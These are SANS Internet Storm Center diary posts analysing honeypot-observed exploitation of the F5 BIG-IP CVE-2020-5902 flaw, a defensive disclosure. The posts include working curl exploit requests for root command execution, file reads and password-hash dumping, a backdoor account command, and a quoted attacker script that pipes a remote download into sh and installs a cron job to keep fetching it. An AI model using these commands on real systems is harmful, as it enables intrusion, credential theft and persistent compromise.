Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
[x] close video | All SANSFIRE Videos

Latest Diaries

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt

Published: 2020-07-07
Last Updated: 2020-07-07 20:12:05 UTC
by Renato Marinho (Version: 1)
2 comment(s)

While monitoring SANS Storm Center's honeypots today, I came across the second F5 BIGIP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (ELF) on a separate system, it was possible to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (152[.]32.180.34:443).

Looking for the web[.]vpnkerio.com at VirusTotal while writing this diary, I could find no AV detecting the network addresses or the binary hash as malicious. 

For persistence, it writes a line on "/etc/init.d/rc.local" file on an attempt to start on system boot.

Examining the binary statically, it is possible to see the string' python -c 'import pty;pty.spawn("/bin/sh")’. It will require more analysis, but it may be used for the attacker to have an interactive terminal on the target system. A proper terminal is usually required for the attacker to run commands like 'su'.

IOCs:

Exploitation attempt source
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123
 

C2 communication
web[.]vpnkerio.com
152[.]32.180.34:443

The backdoor binary
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0  (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

Keywords:
2 comment(s)

Happy Birthday DShield: DShield.org was registered 20 years ago.

Published: 2020-07-07
Last Updated: 2020-07-07 18:07:14 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

And all DShield wants for its Birthday is your logs :). See here for details.

Keywords:
0 comment(s)

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits

Published: 2020-07-06
Last Updated: 2020-07-07 16:29:52 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

Our honeypots have been busy collecting exploit attempts for CVE-2020-5902, the F5 Networks BigIP vulnerability patched last week. Most of the exploits can be considered recognizance. We only saw one working exploit installing a backdoor. Badpackets reported seeing a DDoS bot being installed. 

Thanks to Renato for creating a partial map of the IPs hitting our honeypot so far:

The simplest way to achieve limited command execution is the use of BigIP command-line interface commands. But the function is a bit limited. However, to achieve full-featured command execution, it is possible to just create an alias that points to "bash". 

The result is full code execution in three steps (these requests can us POST or GET. I am using GET here to make them easier to display):

1. Create an "alias" to map the "list" command to "bash"

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash'

{"error":"","output":""}

2. Write a file to /tmp with the command to be executed

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd&content=id'

[several empty lines as output]

3. Use the alias to execute the command.

curl 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/cmd'

{"error":"","output":"uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"}

4. Optionally: remove the alias.

curl'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'

{"error":"","output":""}

If you do not need code execution, you can also use "Step 2" to write files, or you can just read arbitrary files in one step using:

curl -k 'https://f5.sans.edu/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release'

{"output":"BIG-IP release 15.1.0.1 (Final)\n"}

Instead of defining an alias, the technique in step '1' can also be used to execute BigIP CLI command directly, for example, to retrieve password hashes (note this only work if the alias is not defined):

curl 'https://f5.sans.edu//tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

{"error":"","output":"auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$oeE7u1cp$5cOu9tYnEiXYx\/6UuyOTfgJw5nUgXnetzipHdcX7oRc3xwehAFdQGmhzocud3CGH6MYZgqLGb8u6KiITWBsHi\/\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell none\n}\n"}

Most of the commands I have seen so far are "id", "ls" and retrieving files like "/etc/paswd" and the BigIP license file. More interesting commands:

* Adding a backdoor root account:

tmsh create auth user f5admin password getrektdotcom partition-access add { all-partitions { role admin } } shell bash

* Adding a backdoor cron job:

curl 217.12.199.179/b.sh|sh

which retrieves:

#!/bin/sh
ulimit -n 65535
rm -f /etc/ld.so.preload

LDR="wget -q -O -"
if [ -s /usr/bin/curl ]; then
  LDR="curl"
fi
if [ -s /usr/bin/wget ]; then
  LDR="wget -q -O -"
fi

crontab -l | grep -e "217.12.199.179" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "* * * * * $LDR http://217.12.199.179/b.sh | sh > /dev/null 2>&1"
  ) | crontab -
fi

this will check the URL once a minute for updates via cron. So far, I have not seen any other scripts return. Interestingly, after sending an abuse complaint to the ISP hosting the script, my home IP can no longer connect to the site.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

Keywords: bigip cve20205902 f5
2 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Summary of CVE-2020-5902 F5 BIG-IP RCE Vulnerability Exploits
Jul 7th 2020
9 hours ago by Johannes (0 comments)

CVE-2020-5902: F5 BIG-IP RCE Vulnerability
Jul 6th 2020
1 day ago by DidierStevens (0 comments)

CVE-2020-5902 F5 BIG-IP Exploitation Attempt
Jul 5th 2020
2 days ago by DidierStevens (0 comments)

Wireshark 3.2.5 Released
Jul 5th 2020
2 days ago by DidierStevens (0 comments)

Happy FouRth of July from the Internet Storm Center
Jul 4th 2020
3 days ago by Russ McRee (0 comments)

Setting up the Dshield honeypot and tcp-honeypot.py
Jul 2nd 2020
6 days ago by Jim (0 comments)

Elastalert with Sigma
Jul 1st 2020
6 days ago by Tom (0 comments)

View All Diaries →

Latest Discussions

Security Policies
created Jun 30th 2020
1 week ago by Anonymous (1 reply)

IP Address from Hex
created Apr 15th 2020
2 months ago by Anonymous (0 replies)

Best Laptop for Wireshark 3.2
created Apr 14th 2020
2 months ago by ismicok (0 replies)

testgvbgjbhjb.com
created Mar 10th 2020
3 months ago by Bill (9 replies)

DShield analysis
created Mar 1st 2020
4 months ago by Anonymous (0 replies)

View All Forums →

Latest News

Top Diaries

An infection from Rig exploit kit
Jun 17th 2019
1 year ago by Brad (0 comments)

Using a Raspberry Pi honeypot to contribute data to DShield/ISC
Aug 3rd 2017
2 years ago by Johannes (0 comments)

Malspam with password-protected Word docs pushing Dridex
Jun 18th 2019
1 year ago by Brad (0 comments)

Wide-scale Petya variant ransomware attack noted
Jun 27th 2017
3 years ago by Brad (0 comments)

Keep an Eye on Disposable Email Addresses
Mar 7th 2019
1 year ago by Xme (0 comments)